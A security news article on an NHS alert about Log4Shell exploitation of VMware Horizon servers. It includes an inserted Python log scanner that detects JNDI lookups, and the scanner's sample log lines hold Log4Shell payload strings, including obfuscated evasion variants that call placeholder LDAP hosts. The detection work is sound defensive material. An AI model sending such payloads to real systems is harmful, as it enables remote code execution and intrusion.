The Cyber Security News


NHS Warns of Hackers Targeting Log4j Flaws in VMware Horizon

January 8, 2022

The digital security team at the U.K. National Health Service (NHS) has raised the alarm on active exploitation of Log4Shell vulnerabilities in unpatched VMware Horizon servers by an unknown threat actor to drop malicious web shells and establish persistence on affected networks for follow-on attacks.

“The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory Interface™ (JNDI) via Log4Shell payloads to call back to malicious infrastructure,” the non-departmental public body said in an alert. “Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service.”
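The reconnaissance stage described in the alert leaves JNDI lookup strings in request logs, so a log sweep can surface both the attempt and the callback host. The following is an added example, not code from the NHS alert or from this article; the function names and the sample log lines are constructed for illustration, and it goes slightly beyond the text by also normalizing percent-encoded and nested-lookup forms of the same string.

```python
import re
from urllib.parse import unquote

# Nested lookups that resolve to literal text, e.g. ${lower:j} or ${::-j}.
_CASE = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.I)
_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
_JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/:}\s\"]+)", re.I)


def normalize(text, max_rounds=5):
    """Undo percent-encoding and collapse nested lookups until stable."""
    for _ in range(max_rounds):
        new = unquote(text)
        new = _CASE.sub(r"\1", new)
        new = _DEFAULT.sub(r"\1", new)
        if new == text:
            break
        text = new
    return text


def find_jndi_lookups(line):
    """Return (scheme, callback_host) pairs for JNDI lookups in one log line."""
    return [(s.lower(), h.lower()) for s, h in _JNDI.findall(normalize(line))]


def scan(lines):
    """Map 1-based line numbers to the lookups found on that line."""
    hits = {}
    for n, line in enumerate(lines, 1):
        found = find_jndi_lookups(line)
        if found:
            hits[n] = found
    return hits


# Constructed sample access-log lines; hosts and addresses are placeholders.
SAMPLE = [
    '10.0.0.5 - - [08/Jan/2022:10:00:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [08/Jan/2022:10:00:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://callback.example.invalid:1389/a}"',
    '203.0.113.7 - - [08/Jan/2022:10:00:03 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example.invalid%2Fa%7D HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.9 - - [08/Jan/2022:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${::-l}dap://CB2.example.invalid/a}"',
]

if __name__ == "__main__":
    for lineno, found in scan(SAMPLE).items():
        print(lineno, found)
```

A hit only shows that a lookup string reached the log; outbound LDAP connections from the server to the extracted host are what indicate the callback actually happened.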


The web shell, once deployed, can serve as a conduit to carry out a multitude of post-exploitation activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware. VMware Horizon versions 7.x and 8.x are vulnerable to the Log4j vulnerabilities.


Log4Shell is an exploit for CVE-2021-44228 (CVSS score: 10.0), a critical arbitrary remote code execution flaw in Apache Log4j 2, a ubiquitous open-source logging framework, which has been put to use as part of various malware campaigns since it came to light in December 2021. An array of hacking groups, ranging from nation-state actors to ransomware cartels, have pounced on the vulnerability to date.


The development also marks the second time VMware products have come under exploitation stemming from vulnerabilities in the Log4j library. Last month, AdvIntel researchers disclosed that attackers were targeting systems running VMware vCenter servers with the goal of installing Conti ransomware.

VMware, for its part, released security updates last month for Horizon, vCenter, and other products impacted by Log4Shell. The virtualization services provider acknowledged scanning attempts in the wild and urged customers to install the patches where applicable or apply workarounds temporarily to counter any potential risk.



Some pieces of this post are sourced from:
thehackernews.com
